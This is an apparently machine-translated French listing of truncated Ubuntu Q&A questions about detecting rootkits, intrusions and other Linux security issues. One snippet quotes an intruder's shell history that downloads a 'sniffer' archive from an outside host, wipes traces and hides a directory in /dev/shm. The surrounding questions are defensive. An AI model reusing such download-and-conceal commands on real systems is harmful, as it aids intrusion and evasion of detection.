J'utilise Ubuntu 10.04.1 LTS. J'utilise rkhunter pour vérifier les rootkits. rkhunter se plaint des fichiers et répertoires cachés suivants. Je pense que ces fichiers ne sont pas un vrai problème sur mon système, mais comment puis-je vérifier si ces fichiers sont des fichiers légitimes? [07:57:45]...
Je sais que le mot de passe sudo protège mon ordinateur contre le piratage local par quelqu'un y ayant un accès physique ( modifier: en fait, il ne le fait pas ). Mon mot de passe est assez fort à cet effet, mais je sais qu'il n'est pas assez fort si quelqu'un peut le forcer à distance à distance....
L'analyse par chkrootkit montre que "tcpd" est INFECTE. Bien qu'un scan par rkhunter montre ok, (sauf pour les faux positifs réguliers) Dois-je m'inquiéter? (Je suis sur Ubuntu 16.10 avec
Je suis sûr à 99,9% que mon système sur mon ordinateur personnel a été infiltré. Permettez-moi d'abord de donner mon raisonnement pour que la situation soit claire: Chronologie approximative de l'activité suspecte et des mesures ultérieures prises: 4-26 23:00 J'ai terminé tous les programmes et...
Comme 99% des utilisateurs, j'installe Ubuntu à partir de binaires prêts à l'emploi. Comment puis-je vérifier moi-même que ces fichiers binaires proviennent bien du code source d'origine d'Ubuntu? Il serait bon de vérifier que la NSA / quelqu'un n'a pas collaboré avec Ubuntu ou Linode (mon...
J'essaie de comprendre le do-release-upgradeprocessus, c'est-à-dire la façon dont Ubuntu me demande de passer à la prochaine version d'Ubuntu au printemps ou à l'automne. Après avoir lu les sources de, ubuntu-release-upgraderj'ai trouvé le fichier / etc / update-manager / meta-release sur mon...
Sur un système RedHat / CentOS, je peux vérifier les RPM installés sur mon système en utilisant rpm -V . Qu'est-ce que Ubuntu ou l' aptéquivalent de cette
Je comprends que si un logiciel malveillant fait son chemin dans un système Linux, il obtiendra tout au plus un privilège au niveau de l'utilisateur et ruinera tout ce qui est à la portée de l'utilisateur particulier, c'est-à-dire ses propres fichiers. Mais qu'est-ce qui empêche exactement les...
Quelques questions auxquelles je veux répondre dans la réponse: Comment savoir si l'apparmeur est en cours d'exécution? Comment savoir si cela fonctionne bien?
Hier, j'ai vérifié mon historique de commandes sur mon VServer. J'ai trouvé plusieurs lignes suspectes. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget...
Je suis nouveau sur Linux et Ubuntu. Lorsque je ne sais pas comment faire quelque chose avec ce système d'exploitation, je recherche sur le Web et demande à Ubuntu et je trouve toujours la réponse. Mais parfois, ce n'est pas une bonne réponse ni un tutoriel complet. Je suis quand même les...
Je veux analyser ma boîte Ubuntu pour détecter si elle a été piratée. Ma question est: quels sont tous les endroits où chercher pour découvrir si certains logiciels malveillants sont démarrés? Voici une sorte de liste brute: mbr image du noyau (j'ai md5) / sbin / init (j'ai md5) Modules du noyau...
Cela apparaît toujours quelques minutes après ma connexion: Je n'ai aucune idée de ce que c'est. Si je clique sur Signaler un problème , il me demande mon mot de passe: C'est exactement ce que je ferais si je voulais voler le mot de passe de quelqu'un. Pourquoi devrais-je lui faire confiance et que...
Je suis très paranoïaque à propos des connexions sans fil et de quelqu'un qui vole ma bande passante à large bande, ce qui pourrait conduire à des choses pires. Ma question est, comment puis-je détecter si ma bande passante haut débit est volée? J'ai un routeur sans fil Belkin SURF + N300....
Fermé . Cette question doit être plus ciblée . Il n'accepte pas actuellement de réponses. Voulez-vous améliorer cette question? Mettez à jour la question pour qu'elle se concentre sur un seul problème en modifiant ce post . Fermé il y a 4 ans . En parlant d'Ubuntu 10.04, édition serveur, quels...
J'ai lu récemment que quelqu'un avait démontré une attaque de sécurité sur un PC via l'utilisation d'un montage automatique et d'une clé USB. Dans quelle mesure suis-je vulnérable à cette attaque et quelles mesures les développeurs prennent-ils pour être proactifs contre ce genre de...
Comment désactiver cryptswap? J'aimerais un échange non crypté comme avant. C'est sur un système ubuntu
Wine dans son ensemble ou les applications Windows installées via wine peuvent-elles présenter une sorte de risque pour une installation Ubuntu? Cette question s'est posée dans mon esprit lorsque j'ai lu cette réponse à ma question précédente Accès aux sites IE uniquement : Essayez d'installer...
Je viens d'entendre parler de ce bogue "Dirty COW" qui permet à tout utilisateur ayant un accès en lecture aux fichiers de les écrire et d'obtenir un accès administratif. Comment puis-je me protéger contre ce
Après avoir activé ufw et l'auditeur de sécurité Tiger, je vois des avertissements disant: The system accepts ICMP redirection messages Que sont les messages de redirection ICMP? Doivent-ils être désactivés pour des raisons de sécurité? Si oui, quelle est la bonne façon de le faire en utilisant le...